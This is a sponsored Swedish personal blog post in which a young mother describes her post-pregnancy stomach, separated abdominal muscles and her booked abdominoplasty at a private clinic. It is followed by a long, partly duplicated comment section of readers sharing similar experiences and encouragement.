Den nakna sanningen – Bukplastik bokad på Reformkliniken.

I samarbete med Reformkliniken – Bukplastik.

My står i underkläder, strumpor ich en kofta. Hon håller båda sina händer på sin mage och pressar ihop hennes lösa hud på magen. Hon har bokat en bukplastik operation på Reformaklinken.

Hej vännen!

Nu kastar jag av mig kläderna och visar upp mitt största kroppskomplex, nämligen min förskräckliga mage…

 Detta inlägget är svårt för mig att skriva. Plötsligt visar jag upp någonting som jag mer eller mindre under fyra års tid blivit expert på att dölja!

Inlägget innehåller därför mycket text, äkta känslor, en sårbar sida samt en blottande nakenhet både fysiskt och psykiskt.

Vi lever i en många gånger oerhört ytlig värld. Med otroligt mycket starka intryck genom sociala medier såsom,  Instagram, Facebook, Twitter & bloggar vilket gör att man både kan påverka och bli påverkad. Vi matas med bilder på sexpack och magrutor hela dagarna!

Men håll i er för nu ska ni få en äkta mamma mage att titta på! Full av celluliter, bristningar, lös-hud osv! Japp, det är precis så här jag ser ut….

Jag intalar mig att jag står för att skönheten sitter på insidan, hur klyschigt det än låter!

Samtidigt så vet jag själv hur påverkad man kan bli av sitt yttre, som jag gav ett exempel på när jag visade upp helt osminkade bilder på mitt ansikte när min Rosacea sjukdom blossade upp för fullt… (Du kan läsa det inlägget HÄR).

Jag är 27 år, ensamstående mamma till Ludvig 4 år. Trots att jag ”bara” har fött ett barn så har det lämnat tydliga spår efter sig…

Att bli mamma är det största och bästa som har hänt mig! På alla plan! <3

Men EFTER min förlossning vägde jag fortfarande strax under 100 kg! – Helt sjukt! Jag gick upp över 40 kg under min graviditet. Har slitit som ett djur för att komma ner i min nuvarande storlek. Blod, svett och tårar!

-Allting går, med rätt inställning och vilja!

 Vissa kvinnor kan föda barn, efter barn, efter barn, utan att få en enda bristning!?! Så är inte fallet för mig. Hur var det för dig?

 Som många utav er säkert kan känna ingen er i, så har jag fått en skrynklig mage, med bristningar, lös hud, ett ”gummiskinn” med noll spänst överhuvudtaget….. Står jag på alla fyra så hänger den som en äcklig påse! (Haha! Ja, jag vet att man inte alltid står på alla fyra… Bara ett exempel, plankan, armhävningar osv)..

  Jag erkänner! Detta HAR satt spår i min självkänsla! (Mer om det längre ner).

Efter x-antal konsultationer, läkarbesök osv, så har jag slutligen bestämt mig för att göra en bukplastik. Detta är alltså en plastikoperation, en ganska så omfattande sådan.

-Rätt eller fel? Vad tycker du?

Detta är ingenting som jag nyligen har kommit på, det är någonting som jag har velat göra i 3,5 års tid. Jag har lagt galet mycket tid på gymmet. Samt tränat med PT till och från i två års tid. MEN jag kommer aldrig att kunna träna bort detta…

-Varför? Jo, för att mina magmuskler under graviditeten har brustit.

Jag har ett glapp på ca 6,5 cm, vilket gör att även om jag gör tusentals situps så kommer jag ALDRIG att kunna få en fast mage utan bukplastik! Missförstå mig inte nu, träning är bra, på ALLA sätt! Men med sprucken magmuskelatur så har jag ett ”handikapp” i den form utav träningsnivå som jag vill ligga på. Det enda som kan återställa magmuskelaturen är en bukplastik-operation. imageJa, så här ser jag ut! Denna bilden lade jag idag upp på min Instagram och det krävdes mod för att våga göra det.

Tycker att fler riktiga mamma-magar skulle visas upp där ute bland alla magrutor i träningshetsen! Så här kan en mamma mage se ut!

Detta har påverkat mig på många sätt. Jag är expert på att ”dölja” min mage, som jag nämnde tidigare. Jag minns särskilt en situation väldigt väl.

Under Ensam Mamma Söker inspelningen skulle mammorna bubbla tillsammans på spa. Jag fick fullkomlig panik inombords! – Nej, tänkte jag för mig själv! Jag envisades och gjorde ett mindre uppror! Jag övervägde till och med att hoppa av mitt livs största äventyr för att jag inte vågade visa upp min defekta mage. Envisheten segrade och jag fick igenom min vilja att bära baddräkt, istället för bikini. – Pust!

Hur ytligt detta än låter så är det så jag känner. Jag har inte varit avklädd på en strand i Sverige på 4 år. Har inte varit med Ludvig i simhallen efter babysim en enda gång. Självklart gör han alla dessa saker med sin pappa, så det går ingen nöd på honom men jag hade förstås önskat att jag också funnits där med honom.

Jag plåtas inför reportage, mode-plåtningar, hemsidor och i vissa kommersiella reklamsammanhang. Helt okay och jag känner mig bekväm så länge jag har kläderna på!

Men just när det kommer till min mage så är det känsligt gör mig…. jag äcklad utav den! Jag vantrivs verkligen!

– Finns det någon där ute som känner igen sig? Det är ingen rolig känsla.

Under dessa åren så har jag av ren och skär nyfikenhet googlat och letat bland bloggarna för att läsa om just detta. Men av någon anledning så är det ingen som skriver om detta…. det är ett himla ”hysch hysch” när det kommer till plastikoperationer?!

Så information har jag fått skaffa mig genom konsultationer. Jag har flera bekanta som har gjort denna bukplastik, men som ALDRIG skulle erkänna det. -Lite trist!

Jag uppmuntrar inte till OP som en genväg till att må bättre. Men om man som jag efter att ha provat ALLT och lite till , krämer, träning, LPG osv ändå inser….  Att dom där 6,5 cm som glipar, eller den där naveln som är näst intill obefintlig i kombination med ca 18 cm överflödig hud, inte går att få bort på ”naturligt” sätt. Då tycker jag absolut att man ska se över alternativen.

Jag blir inte ytligare som person bara för att jag bestämt mig för att genomföra denna bukplastik-operation.

Just nu är jag glad, förväntansfull och spänd inför operationen. Nervös också såklart! Jag kommer att genomföra OP den 11/2 i Landskrona.

För många så förknippas plastikoperationer med stora bröst & gigantiska läppar! Tyvärr! Så behöver det inte alls vara…

Jag tycker att det är upp till var och en att bestämma över sin kropp. Det viktiga är att man gör det för sin EGEN skull, och förstår att självkänslan INTE kommer med operationen! Det sitter djupare än så!

Men man kan ta hjälp utav erfarna sjuksköterskor och läkare för att uppnå det resultat man vill ha. Jag är inte ute efter att bli smalare, få en ”Barbie”-midja eller en ”perfekt” mage. Utan jag är ute efter att inte ha en ”påse på magen” och längtar efter att kunna dra handen över magen utan att känna min överflödiga hud samt springa hand i hand med Ludvig på stranden i en bikini!

– Jag kan ärligt säga att jag senaste åren äcklats utav min mage! Varför väljer jag att dela med mig utav detta? Jo för att jag i min introduktionstext  skriver att du ska få följa en ÄRLIG blogg. Därför bestämde jag mig för att låta er ta del utav denna resan och jag hoppas samtidigt att jag kan bidra till att ämnet blir mindre skambelagt.

image

Förberedelser inför bukplastik-operation

Just nu förbereder jag mig för fullt inför operationen. Jag som varit sjuk en tid kurerar mig med vitaminer, sömn och vila.

Ni kommer även att få vara med mig när jag checkar in på REFORMKLINIKEN där jag kommer vara inlagd i två dygn och ta del av mina känslor och tankar före och efter operationen.

Ni kommer även att få följa min rehabilitering, varvat med min vanliga vardag, med allt vad den innebär såklart 🙂

image
Här ser ni några olika bilder under resans gång, mot en nyttigare, hälsosammare & starkare livsstil.

-Jösses! Det känns som bekännelsernas vecka för mig!!!

Jag erkände för er att jag fram tills för ett par dagar sedan varit en stor-rökare (1,5 paket/dag) men slutade med det för 1 vecka sedan idag. Sjukt jobbigt! Men jag har gett mig fan på att klara det! 😉

Tack vare min läkare, som ställde det som krav på mig för att genomföra operationen, så vaknade jag upp och insåg hur rökningen faktiskt påverkar mig…. Så nu är det slut på det!

Jag vet att alla har rätt till sin åsikt, och att åsikterna kring detta kommer att vara delade. Jag respekterar att vi alla tycker olika. Du behöver inte tycka som jag. Men om du känner igen dig i min situation… Så är du mer än välkommen att fråga mig kring detta för jag hade önskat att jag hade haft någon i samma situation att prata med..

Samtidigt är jag lite nervös och rädd för att bli dömd pga utav min bukplastik-operation…. Men ärlighet varar längst! Jag hade lätt kunnat dölja den för er, men känner att jag ändå vill stå för hur jag ser ut, hur jag känner och vad jag gör åt det.

Jag svarar på alla mail & kommentarer i den mån jag hinner 🙂

Nu och en tid framöver kommer fokus ligga på förberedelserna inför operationen.. Så vill du följa min resa här inne med förebilder, efterbilder, tankar, känslor, tankar, rehabilitering m.m. så är du varmt välkommen att göra det :). Det är ju ändå det bästa med sociala medier, att man själv väljer vad man vill följa och inte…

Fram för fler ”operfekta” mamma-magar på sociala medier 😉

/ My Martens

141 Komentarer

 1. Håller med dig i det du beskriver. Jag är inte ett dugg dömande när det är noga övervägda beslut. Vad jag däremot reagerade ganska kraftigt mot i din text var att produktionen bakom Ensam Mamma Söker insisterade att filma sina deltagare i bikinis….saknar ord nästan över denna utseendefixering som media bidrar till. Vad händer om någon väldigt överviktig söker och blir deltagare i det programmet, eller de kanske inte väljer ut deltagare som inte uppfyller deras kroppsideal?! Önskar dig lycka till med operationen.

 2. Hej! Jag vet precis hur du känner & har mått precis som du över min degiga, skrynkliga, pösiga mage full med bristningar. Så blev min mage efter min första graviditet ( 24 år) & jag gick upp ca 30kg. Dock vägde sonen 5220g & var 57 cm lång när han kom ut & jag hade massa vatten i kroppen. Magen blev förstörd & de sa att det där kan du få hjälp av landstinget att fixa till. Men det efter du fått de barnen du vill ha. Precis som du så visade jag mig inte i bikini el i baddräkt på stranden, el badhuset. Slutade spela fotboll, o visade mig knappt för sambon o kunde inte Ha vilka kläderna som jag egentligen ville ha. Magen fick mig att må så fruktansvärt dåligt, så efter jag fått två barn till ( ( 8 år efter första barnet) bestämde jag mig att fixa magen med en bukplastik! Dock fick jag inte hjälp av landstinget, då jag enligt den inte hade tillräckligt mycket skin som hängde ( 1/2 cm fattades )! Att man mådde tåligt psykiskt sket de fullständigt i! Så där blev det nej! Tog då saken i egna händer & gjorde det privat. Mycket pengar, men det är det bästa jag gjort! Detta gjorde jag i nov/dec 2012. Nu kan jag åka till badhuset & stranden i bikini. Jag kan ha de kläderna som jag vill, åka på spa med tjejkompisarna mm. Men det bästa är att jag trivs med mig själv både psykiskt & fysiskt! Lycka till!!
  Undrar du något så är det bara att höra av dig!

 3. Jag tycker du gör helt rätt!!!! Det är DIN kropp, som DU ska trivas i. Och när det finns operationer, utförda av skickliga läkare, som kan åtgärda det så är det väl helt underbart att du kan göra det ?
  Go for it My! Stort lycka till med operationen, jag håller tummar och tår för att det kommer att gå toppenbra! ?
  Kram

 4. Nyss börjar läsa din blogg. Måste bara säga att jag blev imponerad av att du vågar visa dig och vara ärlig trots de komplex du har. Starkt av dig våga stå upp gör dig. Hoppas operationen blir det slutmål på den resa du gjort ned viktnedgång och träning. Att du får njuta av bada i bikini med sonen.
  Jag har precis börjat min resa för att gå ner 40 kilo om inte mer.
  Mvh Sara

 5. Hej my! Mitt namn är Jenny och har precis läst ditt senaste inlägg på din blogg, starkt av dig att visa upp dig och berätta om det du känner är jobbigt! Jag har själv barn 4 st dessutom och är ”bara” 30 år och har för ca 4 månader sedan gått igenom det du nu snart ska göra och jag kan bara säga till dig att du kommer inte att ångra dig, den här operationen var det bästa som jag gjort och ångrar ingenting! Stå på dig gumman och jag väntar med spänning över att få veta hur det gått och efter bilder senare kan även dela med mig av mina före och efter bilder. Måste bara få fråga är det på ett vanligt sjukhus elr på en privat klinik du ska göra operationen på och får du betala för den? Kram jenny

 6. Starkt av dig att visa upp ditt största komplex och att ingen är perfekt! Det bästa är att man själv kan bestämma om man vill göra något åt det! De ska ingen dömma! Däremot så kan man göra magmuskeldelningen mindre utan operation. Men det vet du kanske redan? Rätt typ av träning där situps verkligen är det värsta du kan göra. Olga Rönnberg är specialiserad på mammamagar och ger mycket tips på hur du kan föra för att minska del ingen. Lycka till med din operation.

 7. Hej My
  Jag har fött tre barn o fått galet mycket bristningar utan att gå upp mycket i vikt. Jag har känt precis likadant som du skriver. Speciellt när någon nämt spa, då har har hittat på alla olika undanflykter för att slippa. Har skämts oberört mycket för min äckliga mage. Jag hade bestämt mig redan efter barn nr 2 att en bukplastik måste jag göra. Men efter nr 3 så blev min magmuskeldelning så mycket att den påverkade min rygg så jag gick nästan allt med ryggont. Jag sökte vc för att få en bedömning o fick faktiskt min bukplastik betald av landstinget där jag bor. Det är det nästa jag någonsin gjort för mig o min självkänsla. Jag tycker dock att återhämtningstiden var väldigt lång men nu efter exakt ett år så var det helt klart värt det!
  Du gör helt rätt att göra denna op! Jag kan idag känna när jag spänner magen el inte har nog inte kunnat det på de senaste 8 åren känner mig så stark både psykiskt och självklart fysiskt nu när man verkligen kan träna igen

  • Hej! Vilket landsting tillhör du? Jag har gått runt till olika kirurger i två olika landsting, Stockholms och Sörmlands i flera års tid, men de anser att det är ett skönhetsfel trots fem cm delning mellan magmusklerna och ryggont. Nu har jag upp och har bestämt mig för en privat plastikkirurg. Men du som skrev inlägget att landstinget betalade, det lät väldigt hoppfullt! Jag är som sagt väldigt nyfiken på var i Sverige detta var. Tacksam för svar, Jenny

   • Hej! Jag vet inte vem som skrev det… men jag rekommenderar verkligen att gå via en privat klinik! Citadell kliniken i Landskrona gjorde min… jag läker fortfarand, men är JÄTTE nöjd! Man kan ta ett medical lån om man har svårt att finansiera det… lycka till <3

 8. Håller med dig i det du beskriver. Jag är inte ett dugg dömande när det är noga övervägda beslut. Vad jag däremot reagerade ganska kraftigt mot i din text var att produktionen bakom Ensam Mamma Söker insisterade att filma sina deltagare i bikinis….saknar ord nästan över denna utseendefixering som media bidrar till. Vad händer om någon väldigt överviktig söker och blir deltagare i det programmet, eller de kanske inte väljer ut deltagare som inte uppfyller deras kroppsideal?! Önskar dig lycka till med operationen.

 9. Hej My!
  Jag tycker att du även ska konsultera Olga Rönnberg! Hon har gjort underverk på bra mycket värre fall än din mage!
  Lycka till med vad du än beslutar dig för!

 10. Hej! Jag vet precis hur du känner & har mått precis som du över min degiga, skrynkliga, pösiga mage full med bristningar. Så blev min mage efter min första graviditet ( 24 år) & jag gick upp ca 30kg. Dock vägde sonen 5220g & var 57 cm lång när han kom ut & jag hade massa vatten i kroppen. Magen blev förstörd & de sa att det där kan du få hjälp av landstinget att fixa till. Men det efter du fått de barnen du vill ha. Precis som du så visade jag mig inte i bikini el i baddräkt på stranden, el badhuset. Slutade spela fotboll, o visade mig knappt för sambon o kunde inte Ha vilka kläderna som jag egentligen ville ha. Magen fick mig att må så fruktansvärt dåligt, så efter jag fått två barn till ( ( 8 år efter första barnet) bestämde jag mig att fixa magen med en bukplastik! Dock fick jag inte hjälp av landstinget, då jag enligt den inte hade tillräckligt mycket skin som hängde ( 1/2 cm fattades )! Att man mådde tåligt psykiskt sket de fullständigt i! Så där blev det nej! Tog då saken i egna händer & gjorde det privat. Mycket pengar, men det är det bästa jag gjort! Detta gjorde jag i nov/dec 2012. Nu kan jag åka till badhuset & stranden i bikini. Jag kan ha de kläderna som jag vill, åka på spa med tjejkompisarna mm. Men det bästa är att jag trivs med mig själv både psykiskt & fysiskt! Lycka till!!
  Undrar du något så är det bara att höra av dig!

 11. Jag tycker du gör helt rätt!!!! Det är DIN kropp, som DU ska trivas i. Och när det finns operationer, utförda av skickliga läkare, som kan åtgärda det så är det väl helt underbart att du kan göra det 🙂
  Go for it My! Stort lycka till med operationen, jag håller tummar och tår för att det kommer att gå toppenbra! 🙂

  Kram

 12. Tycker du är stark och en jättebra förebild som vågar visa upp din mage. Du gör det du tycker är bäst för dig och din kropp och din självkänsla. All lycka till med din operation! Stor kram Jenny

 13. Du satte till punkt och pricka ord på hur jag känner inför min mage. Har också bara fött ett barn och den graviditeten förstörde tyvärr min kropp, dessutom har jag ett kejsarsnittsärr som gör att det blir en ännu värre skinnpåse där. Nej usch, jag vill med göra en bukoperation bums!

 14. Nyss börjar läsa din blogg. Måste bara säga att jag blev imponerad av att du vågar visa dig och vara ärlig trots de komplex du har. Starkt av dig våga stå upp gör dig. Hoppas operationen blir det slutmål på den resa du gjort ned viktnedgång och träning. Att du får njuta av bada i bikini med sonen.

  Jag har precis börjat min resa för att gå ner 40 kilo om inte mer.

  Mvh Sara

 15. Hej my! Mitt namn är Jenny och har precis läst ditt senaste inlägg på din blogg, starkt av dig att visa upp dig och berätta om det du känner är jobbigt! Jag har själv barn 4 st dessutom och är ”bara” 30 år och har för ca 4 månader sedan gått igenom det du nu snart ska göra och jag kan bara säga till dig att du kommer inte att ångra dig, den här operationen var det bästa som jag gjort och ångrar ingenting! Stå på dig gumman och jag väntar med spänning över att få veta hur det gått och efter bilder senare kan även dela med mig av mina före och efter bilder. Måste bara få fråga är det på ett vanligt sjukhus elr på en privat klinik du ska göra operationen på och får du betala för den? Kram jenny

 16. Tycker du gör helt rätt man ska göra det som känns rätt för en själv. Har själv lite bullig mage som jag aldrig fått bort även att jag försöker göra mitt bästa med träningen.
  Lycka till det kommer gå jätte bra?
  Kram Terese

 17. Starkt av dig att visa upp ditt största komplex och att ingen är perfekt! Det bästa är att man själv kan bestämma om man vill göra något åt det! De ska ingen dömma! Däremot så kan man göra magmuskeldelningen mindre utan operation. Men det vet du kanske redan? Rätt typ av träning där situps verkligen är det värsta du kan göra. Olga Rönnberg är specialiserad på mammamagar och ger mycket tips på hur du kan föra för att minska del ingen. Lycka till med din operation.

 18. Hej My
  Jag har fött tre barn o fått galet mycket bristningar utan att gå upp mycket i vikt. Jag har känt precis likadant som du skriver. Speciellt när någon nämt spa, då har har hittat på alla olika undanflykter för att slippa. Har skämts oberört mycket för min äckliga mage. Jag hade bestämt mig redan efter barn nr 2 att en bukplastik måste jag göra. Men efter nr 3 så blev min magmuskeldelning så mycket att den påverkade min rygg så jag gick nästan allt med ryggont. Jag sökte vc för att få en bedömning o fick faktiskt min bukplastik betald av landstinget där jag bor. Det är det nästa jag någonsin gjort för mig o min självkänsla. Jag tycker dock att återhämtningstiden var väldigt lång men nu efter exakt ett år så var det helt klart värt det!
  Du gör helt rätt att göra denna op! Jag kan idag känna när jag spänner magen el inte har nog inte kunnat det på de senaste 8 åren känner mig så stark både psykiskt och självklart fysiskt nu när man verkligen kan träna igen

  • Hej! Vilket landsting tillhör du? Jag har gått runt till olika kirurger i två olika landsting, Stockholms och Sörmlands i flera års tid, men de anser att det är ett skönhetsfel trots fem cm delning mellan magmusklerna och ryggont. Nu har jag upp och har bestämt mig för en privat plastikkirurg. Men du som skrev inlägget att landstinget betalade, det lät väldigt hoppfullt! Jag är som sagt väldigt nyfiken på var i Sverige detta var. Tacksam för svar, Jenny

   • Hej! Jag vet inte vem som skrev det… men jag rekommenderar verkligen att gå via en privat klinik! Citadell kliniken i Landskrona gjorde min… jag läker fortfarand, men är JÄTTE nöjd! Man kan ta ett medical lån om man har svårt att finansiera det… lycka till <3

 19. Hej My!
  Jag tycker att du även ska konsultera Olga Rönnberg! Hon har gjort underverk på bra mycket värre fall än din mage!

  Lycka till med vad du än beslutar dig för!

 20. Gått igenom samma som dig, trots mina små komplikationer efter så va de absolut värt de, å citadell är bara så vackert:-) lycka till, du kommer vakna upp till en ny kropp, ja grät när jag såg min första gången. All lycka till dig ♡

 21. Hej My!
  Du är bara så bäst! Fattar att du och Maggan blivit vänner; det känns som att ni passar väldigt bra ihop!
  Jag beundrarde dig såå oerhört då du visade dig med din rosacea. Har det själv (lindrig) variant som kommer ibland.
  Detta gjorde mig så förvånad för jag trodde att du som är smal har nog en ”fin” mage” såklart. Visste inte om din stora viktuppgång då jag följer dig mest på insta.och via Maggans blogg såklart. Gör det; känns det bra i mage och hjärta så kör!
  Kram på dig!
  Malin

 22. Modiga tjej, såklart du ska operera din skadade mage! Hade ingen aning om att det kan bli så här, för som du skriver, det är ingen som går ut öppet med detta. Du gör helt rätt och jag önskar dig stort lycka till med ingreppet och hoppas innerligt att du får en superskicklig kirurg så du får det resultat du önskar! Heja dig!

 23. Starkt av dig! Fick precis samma mage efter mina barn som nu är i 30-års åldern. På den tiden fanns inte möjligheten att göra en plastikoperation. Men sen dess har jag aldrig gillat magen. Du är ung och har livet framför dig, du gör helt rätt! Lycka till med allt, du kommer bli ännu snyggare

 24. Jag förstår precis hur du känner! Jag fick mina två döttrar när jag var 24 och 25 år. Gick upp cirka 30 kg vid varje graviditet och dotter nr 2 gick jag dessutom 16 dagar över tiden med. Fick bristningar över hela magen men även på andra ställen. Har mått så himla dåligt över detta och under flera år tänkte jag ständigt på detta. Äcklades verkligen av min mage och kropp. Barnens pappa och jag separerade när jag var 30 och jag mådde fruktansvärt dåligt i några år. Trodde aldrig att jag skulle kunna träffa någon som ville ha mig och min sprängda mage. Och förstod inte hur jag någonsin skulle våga visa mig utan kläder för någon. Idag är jag drygt 40 och har någorlunda lärt mig att leva med min mage. Fortfarande är jag inte bekväm med att visa magen för andra än min sambo och mina barn. Tills för några år sedan pratade jag aldrig någonsin om detta med någon, men idag kan jag prata öppet om det. Kanske att jag en dag kan släppa magen fri utan att känna mig obekväm, men tror nog inte det… Under några år funderade jag på en bukplastik men hade inte råd att göra det. Min mage har påverkat hela mitt liv och verkligen begränsat mig. Jag tycker verkligen att du ska göra operationen om det känns rätt för dig och när du känner som du gör. Det är du som ska leva med magen och vara nöjd. Det är inte ett dugg ytligt! Kram

 25. Tycker du är stark och en jättebra förebild som vågar visa upp din mage. Du gör det du tycker är bäst för dig och din kropp och din självkänsla. All lycka till med din operation! Stor kram Jenny

 26. Du satte till punkt och pricka ord på hur jag känner inför min mage. Har också bara fött ett barn och den graviditeten förstörde tyvärr min kropp, dessutom har jag ett kejsarsnittsärr som gör att det blir en ännu värre skinnpåse där. Nej usch, jag vill med göra en bukoperation bums!

 27. Tycker du gör helt rätt man ska göra det som känns rätt för en själv. Har själv lite bullig mage som jag aldrig fått bort även att jag försöker göra mitt bästa med träningen.
  Lycka till det kommer gå jätte bra?
  Kram Terese

 28. Wow. Alltså jag trodde aldrig att du hade samma problem som jag. Det syns inte på dig! Jag gick upp säkert 25 kg under min graviditet och fick sjukt mycket bristningar och hängmage precis som du. Jag äcklas också av min mage, jag vet att den aldrig kommer bli som förr. Jag har provat med rollers för att förnya huden men det var ju bara att glömma att det skulle fungera. Vad glad jag är att höra att man kan operera, inte för att jag kommer att göra det i nuläget iaf, men för att möjligheten finns. Du är otroligt stark som visar bilder på din mage. Jag tror jag är lite i chock, trodde att jag var så ensam med mitt magproblem… Stort cred till dig som vågar!

 29. Go for it My! Eftersom du provat allt och inte tar detta som en quick fix utan du har ändå haft det såhär i fyra år så tycker jag du gör helt rätt. Har själv aldrig fött barn så vet inte hur det blir efteråt men skulle jag känna som du gör så skulle jag också genomföra denna operation. Vi har alla lite komplex på stranden, men som du säger att du inte ens går i bikini till stranden eller till badhuset – så får det inte va!
  Önskar dig all lycka till och jag läser stadigt din blogg och kommer fortsätta med det ?

 30. Du gör helt rätt!!! Hur ytligt det än kan verka i andras ögon så är det jätteviktigt att trivas med sig själv! Jg opererade mina bröst på citadellkliniken för bara nån månad sen, just pga graviditet… Och jag känner redan hur mycket bättre jag mår när jag ser mig själv i spegeln!! Vissa saker går inte att lösa på naturligt sätt, så är det bara, och om man då har möjlighet att förbättra det, och därmed sin självkänsla, något med en operation så tycker jag absolut man ska göra det! Stort lycka till och tack för en jättebra, och härligt ärlig blogg!! Kram Josefin

 31. Förstår precis hur du känner. Jag gjorde samma operation för snart tre månader sedan och det är absolut det bästa beslut jag har tagit. Modig är du som går ut offentligt och skriver om detta. Jag har själv varit väldigt öppen med min omgivning och berättat vad jag gjort och fått full förståelse från samtliga. Du kommer inte ångra ditt beslut och det ska bli spännande att följa din resa. Lycka till!

 32. Jag tycker du är grymt modig, stort av dig och vad fint att dina läsare inte tryckte ner dig som dom flesta gör på alla andra bloggar.
  Och ja, jag känner ingen mig till en viss gräns. Jag har komplexer efter graviditeterna, har haft två tätt inpå och så det förstörde HELA min kropp på MÅNGA olika sätt, fy fan säger jag bara. Jag vill inte ens visa mig för min egna man längre, gömmer mig och en massa annat.. Min största rädsla är bukplastik, är livrädd för ärret och ska man tex lyfta bröst också så har man en kropp full av ärr, som en karta. Fan vad jag än gör är jag körd, helt förstörd. Så ja jag vet hur det är att vantrivas med kroppen, att ha komplex och må skit, men samtidigt kämpa med att trivas, gömma, passa in i den här jävla pressen om att man måste älska sig själv..
  Jag har 10 kg kvar att gå ner men vågar INTE gå ner dom, har kämpat länge men vågar inte innerst inne, av rädsla av att kanske få så lös hud att jag MÅSTE operera mig för att någonsin kunna ha en bikini igen. En gång i tiden, hade jag en GRYM kropp, platt mage, var super snygg. Men men dom dagarna är förbi.
  Lycka till kära My, självklart ska du göra vad du vill för dig själv. Livet är för kort för att oroa sig om att passa in i den här pressande accepterande världen. Vi föddes banne mig inte med hängtuttar och lösmage så varför måste jag acceptera det?!
  Jag vill GÄRNA följa upp på hur det var, känsla, resultat, smärta.

 33. Gått igenom samma som dig, trots mina små komplikationer efter så va de absolut värt de, å citadell är bara så vackert:-) lycka till, du kommer vakna upp till en ny kropp, ja grät när jag såg min första gången. All lycka till dig ♡

 34. Hej My!
  Du är bara så bäst! Fattar att du och Maggan blivit vänner; det känns som att ni passar väldigt bra ihop!
  Jag beundrarde dig såå oerhört då du visade dig med din rosacea. Har det själv (lindrig) variant som kommer ibland.
  Detta gjorde mig så förvånad för jag trodde att du som är smal har nog en ”fin” mage” såklart. Visste inte om din stora viktuppgång då jag följer dig mest på insta.och via Maggans blogg såklart. Gör det; känns det bra i mage och hjärta så kör!
  Kram på dig!
  Malin

 35. Modiga tjej, såklart du ska operera din skadade mage! Hade ingen aning om att det kan bli så här, för som du skriver, det är ingen som går ut öppet med detta. Du gör helt rätt och jag önskar dig stort lycka till med ingreppet och hoppas innerligt att du får en superskicklig kirurg så du får det resultat du önskar! Heja dig!

 36. Starkt av dig! Fick precis samma mage efter mina barn som nu är i 30-års åldern. På den tiden fanns inte möjligheten att göra en plastikoperation. Men sen dess har jag aldrig gillat magen. Du är ung och har livet framför dig, du gör helt rätt! Lycka till med allt, du kommer bli ännu snyggare

 37. Jag förstår precis hur du känner! Jag fick mina två döttrar när jag var 24 och 25 år. Gick upp cirka 30 kg vid varje graviditet och dotter nr 2 gick jag dessutom 16 dagar över tiden med. Fick bristningar över hela magen men även på andra ställen. Har mått så himla dåligt över detta och under flera år tänkte jag ständigt på detta. Äcklades verkligen av min mage och kropp. Barnens pappa och jag separerade när jag var 30 och jag mådde fruktansvärt dåligt i några år. Trodde aldrig att jag skulle kunna träffa någon som ville ha mig och min sprängda mage. Och förstod inte hur jag någonsin skulle våga visa mig utan kläder för någon. Idag är jag drygt 40 och har någorlunda lärt mig att leva med min mage. Fortfarande är jag inte bekväm med att visa magen för andra än min sambo och mina barn. Tills för några år sedan pratade jag aldrig någonsin om detta med någon, men idag kan jag prata öppet om det. Kanske att jag en dag kan släppa magen fri utan att känna mig obekväm, men tror nog inte det… Under några år funderade jag på en bukplastik men hade inte råd att göra det. Min mage har påverkat hela mitt liv och verkligen begränsat mig. Jag tycker verkligen att du ska göra operationen om det känns rätt för dig och när du känner som du gör. Det är du som ska leva med magen och vara nöjd. Det är inte ett dugg ytligt! Kram

 38. Wow. Alltså jag trodde aldrig att du hade samma problem som jag. Det syns inte på dig! Jag gick upp säkert 25 kg under min graviditet och fick sjukt mycket bristningar och hängmage precis som du. Jag äcklas också av min mage, jag vet att den aldrig kommer bli som förr. Jag har provat med rollers för att förnya huden men det var ju bara att glömma att det skulle fungera. Vad glad jag är att höra att man kan operera, inte för att jag kommer att göra det i nuläget iaf, men för att möjligheten finns. Du är otroligt stark som visar bilder på din mage. Jag tror jag är lite i chock, trodde att jag var så ensam med mitt magproblem… Stort cred till dig som vågar!

 39. Go for it My! Eftersom du provat allt och inte tar detta som en quick fix utan du har ändå haft det såhär i fyra år så tycker jag du gör helt rätt. Har själv aldrig fött barn så vet inte hur det blir efteråt men skulle jag känna som du gör så skulle jag också genomföra denna operation. Vi har alla lite komplex på stranden, men som du säger att du inte ens går i bikini till stranden eller till badhuset – så får det inte va!

  Önskar dig all lycka till och jag läser stadigt din blogg och kommer fortsätta med det 🙂

 40. Du gör helt rätt!!! Hur ytligt det än kan verka i andras ögon så är det jätteviktigt att trivas med sig själv! Jg opererade mina bröst på citadellkliniken för bara nån månad sen, just pga graviditet… Och jag känner redan hur mycket bättre jag mår när jag ser mig själv i spegeln!! Vissa saker går inte att lösa på naturligt sätt, så är det bara, och om man då har möjlighet att förbättra det, och därmed sin självkänsla, något med en operation så tycker jag absolut man ska göra det! Stort lycka till och tack för en jättebra, och härligt ärlig blogg!! Kram Josefin

 41. Förstår precis hur du känner. Jag gjorde samma operation för snart tre månader sedan och det är absolut det bästa beslut jag har tagit. Modig är du som går ut offentligt och skriver om detta. Jag har själv varit väldigt öppen med min omgivning och berättat vad jag gjort och fått full förståelse från samtliga. Du kommer inte ångra ditt beslut och det ska bli spännande att följa din resa. Lycka till!

 42. Jag tycker du är grymt modig, stort av dig och vad fint att dina läsare inte tryckte ner dig som dom flesta gör på alla andra bloggar.

  Och ja, jag känner ingen mig till en viss gräns. Jag har komplexer efter graviditeterna, har haft två tätt inpå och så det förstörde HELA min kropp på MÅNGA olika sätt, fy fan säger jag bara. Jag vill inte ens visa mig för min egna man längre, gömmer mig och en massa annat.. Min största rädsla är bukplastik, är livrädd för ärret och ska man tex lyfta bröst också så har man en kropp full av ärr, som en karta. Fan vad jag än gör är jag körd, helt förstörd. Så ja jag vet hur det är att vantrivas med kroppen, att ha komplex och må skit, men samtidigt kämpa med att trivas, gömma, passa in i den här jävla pressen om att man måste älska sig själv..

  Jag har 10 kg kvar att gå ner men vågar INTE gå ner dom, har kämpat länge men vågar inte innerst inne, av rädsla av att kanske få så lös hud att jag MÅSTE operera mig för att någonsin kunna ha en bikini igen. En gång i tiden, hade jag en GRYM kropp, platt mage, var super snygg. Men men dom dagarna är förbi.

  Lycka till kära My, självklart ska du göra vad du vill för dig själv. Livet är för kort för att oroa sig om att passa in i den här pressande accepterande världen. Vi föddes banne mig inte med hängtuttar och lösmage så varför måste jag acceptera det?!

  Jag vill GÄRNA följa upp på hur det var, känsla, resultat, smärta.

 43. tack, för att du delar med dig. Efter två födslar känner jag igen mig mycket i det du skriver och självbilden av min egen mage. Lycka till med operationen

 44. Ett bra beslut kan jag tycka! Finns ingen anledning att gå och må dåligt över saker man kan fixa till! Har en väninna som gjort denna operation för många år sedan och hon fick en jätte fin mage! Så Lycka Till ropar Jag o Kalle ifrån Spanien! Kramar!

